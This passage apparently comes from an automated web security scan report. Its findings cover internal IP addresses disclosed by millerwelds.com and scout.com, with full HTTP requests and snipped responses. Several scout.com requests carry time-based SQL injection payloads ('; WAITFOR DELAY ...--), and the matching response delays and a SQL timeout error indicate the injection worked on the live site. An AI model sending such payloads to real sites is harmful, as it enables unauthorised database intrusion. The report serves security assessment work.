Path:   /images/nav-new/wheretobuy.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav-new/wheretobuy.gif HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/gif
Expires: Fri, 13 May 2011 17:58:51 GMT
Last-Modified: Thu, 13 Jan 2011 18:00:09 GMT
Content-Length: 617
Date: Fri, 06 May 2011 19:11:32 GMT
X-Varnish: 1128232180 1127467355
Age: 4361
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

GIF89ai.*.......333@@@............///...... ............ppp...PPP000```....................................!.......,....i.*.... %.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z..07@.....z.n..p.|N.
...[SNIP]...
28.160. http://www.millerwelds.com/images/navicons.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /images/navicons.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/navicons.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=604800
Content-Type: image/png
Expires: Fri, 13 May 2011 17:58:51 GMT
Last-Modified: Thu, 13 Jan 2011 18:01:06 GMT
Content-Length: 9221
Date: Fri, 06 May 2011 19:11:34 GMT
X-Varnish: 1128232481 1127467418
Age: 4363
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

.PNG
.
...IHDR...$..........3c(....tEXtSoftware.Adobe ImageReadyq.e<..#.IDATx....\TW..La....^.
.b..D%.h......q.M..&.w........d.H1.5....K,!.c#XA..ED..Pf..0L..s. .....M...~n...y..<...s..p8..O......b
...[SNIP]...
28.161. http://www.scout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.2.9.1304728228796

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:30:31 GMT
Content-Type: text/html
Expires: Fri, 06 May 2011 19:40:31 GMT
Last-Modified: Fri, 06 May 2011 17:41:15 GMT
Accept-Ranges: bytes
ETag: "1CC0C14CC196F80"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 98822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com - College and High School Football, Basketball, Recruiti
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=1&noredir=1&fromprefetch=1
By:
Date: Fri May 6 10:41:15 PDT 2011
-->
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 10:41:14 AM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.63, CEDAR
Page Execution Time: 98 ms
-->
...[SNIP]...
28.162. http://www.scout.com/2/Netsparker14ebae4518d541eba819cda8fa442840.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/Netsparker14ebae4518d541eba819cda8fa442840.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /2/Netsparker14ebae4518d541eba819cda8fa442840.z HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 06 May 2011 19:56:50 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
By: -1
Date: 5/5/2011 4:50:07 PM
-->
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Thursday, May 05, 2011 4:50:07 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
Server IP: 192.168.20.92, CHERRY
Page Execution Time: 31 ms
-->
...[SNIP]...
28.163. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:30%27--&fromprefetch=1&p=26&s=143 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:49:36 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:59:06 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 2393


<!--
ERROR in function:    "DB_Template_GET_BySiteAndPageType()"
- Local date/time :    Friday, May 06, 2011 12:49:36 PM
- Source :        .Net SqlClient Data Provider
- Message :        Timeout expired.
...[SNIP]...
scription :        undefined
- description :        undefined
- URL:        cfg='%3bWAITFOR+DELAY+'0%3a0%3a30'--&fromprefetch=1&p=26&s=143
- Remote IP :        173.193.214.243
- Referrer URL :        
- Server IP:        192.168.20.94, SCOUTWEB2
- MachineName:        SCOUTWEB2
- Stack Trace:
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)
at System.Data.SqlClient.SqlInternalCo
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:49:36 PM
URL: http://www.scout.com:80/Legacy/a.z?cfg='%3bWAITFOR+DELAY+'0%3a0%3a30'--&fromprefetch=1&p=26&s=143
Server IP: 192.168.20.94, SCOUTWEB2
Page Execution Time: 30,008 ms
-->
...[SNIP]...
28.164. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:0%27--&fromprefetch=1&p=26&s=143 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:49:06 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:59:06 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 11982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:49:06 PM
URL: http://www.scout.com:80/Legacy/a.z?cfg='%3bWAITFOR+DELAY+'0%3a0%3a0'--&fromprefetch=1&p=26&s=143
Server IP: 192.168.20.93, SCOUTWEB1
Page Execution Time: 24 ms
-->
...[SNIP]...
28.165. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /2/a.z HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.10.9.1304728228796

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 19:31:35 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: public, s-maxage=600
Expires: Fri, 06 May 2011 19:41:35 GMT
Content-Type: text/html
Content-Length: 12238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
By: -1
Date: 5/5/2011 4:50:07 PM
-->
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Thursday, May 05, 2011 4:50:07 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
Server IP: 192.168.20.92, CHERRY
Page Execution Time: 31 ms
-->
...[SNIP]...
28.166. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:22%27--&fromprefetch=1&p=26&s=143 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:51:10 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:00:48 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:51:10 PM
URL: http://www.scout.com:80/Legacy/a.z?cfg='%3bWAITFOR+DELAY+'0%3a0%3a22'--&fromprefetch=1&p=26&s=143
Server IP: 192.168.20.73, SCOUTWEB6
Page Execution Time: 22,034 ms
-->
...[SNIP]...
28.167. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /2/a.z?cfg=2=1&p=26&s=143 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.4.9.1304728228796

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:30:52 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:40:52 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 12018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:30:52 PM
URL: http://www.scout.com:80/Legacy/a.z?cfg=2%3d1&p=26&s=143
Server IP: 192.168.20.90, SUMMIT
Page Execution Time: 29 ms
-->
...[SNIP]...
28.168. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /2/a.z?cfg=o&fromprefetch=1&p=26&s=143 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.9.9.1304728228796

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:31:22 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:41:22 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 12082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:31:22 PM
URL: http://www.scout.com:80/Legacy/a.z?cfg=o&fromprefetch=1&p=26&s=143
Server IP: 192.168.20.68, SCOUTWEB9
Page Execution Time: 29 ms
-->
...[SNIP]...
28.169. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /2/a.z?cfg=1&p=26&s=143 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.5.9.1304728228796

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:31:01 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:41:01 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 12011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:31:01 PM
URL: http://www.scout.com:80/Legacy/a.z?cfg=1&p=26&s=143
Server IP: 192.168.20.95, SCOUTWEB3
Page Execution Time: 23 ms
-->
...[SNIP]...
28.170. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /2/a.z?cfg=2&fromprefetch=1&p=26&s=143 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.8.9.1304728228796

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:31:15 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:41:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 12082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:31:15 PM
URL: http://www.scout.com:80/Legacy/a.z?cfg=2&fromprefetch=1&p=26&s=143
Server IP: 192.168.20.71, SCOUTWEB5
Page Execution Time: 29 ms
-->
...[SNIP]...
28.171. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=202704078.454375544.1303509265.1303516031.1303522301.3

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:29:27 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:39:01 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Vary: Accept-Encoding
Content-Length: 11983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:29:26 PM
URL: http://www.scout.com:80/Legacy/a.z?cfg='%3bWAITFOR+DELAY+'0%3a0%3a25'--&fromprefetch=1&p=26&s=143
Server IP: 192.168.20.64, SODO
Page Execution Time: 25,036 ms
-->
...[SNIP]...
28.172. http://www.scout.com/Legacy/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /Legacy/a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /Legacy/a.z HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304728142.1304731683.5; __utmc=202704078; UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmb=202704078.2.9.1304732669570;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 06 May 2011 20:44:56 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: public, s-maxage=600
Expires: Fri, 06 May 2011 20:54:56 GMT
Content-Type: text/html
Content-Length: 12238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
By: -1
Date: 5/5/2011 4:50:07 PM
-->
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Thursday, May 05, 2011 4:50:07 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
Server IP: 192.168.20.92, CHERRY
Page Execution Time: 31 ms
-->
...[SNIP]...
28.173. http://www.scout.com/Netsparker892e409084b746c39d5b25ba070e12d8.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /Netsparker892e409084b746c39d5b25ba070e12d8.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /Netsparker892e409084b746c39d5b25ba070e12d8.z HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 06 May 2011 19:57:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Pike
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
By: -1
Date: 5/5/2011 4:50:07 PM
-->
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Thursday, May 05, 2011 4:50:07 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
Server IP: 192.168.20.92, CHERRY
Page Execution Time: 31 ms
-->
...[SNIP]...
28.174. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=143&p=9&c=%27;WAITFOR%20DELAY%20%270:0:25%27--&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
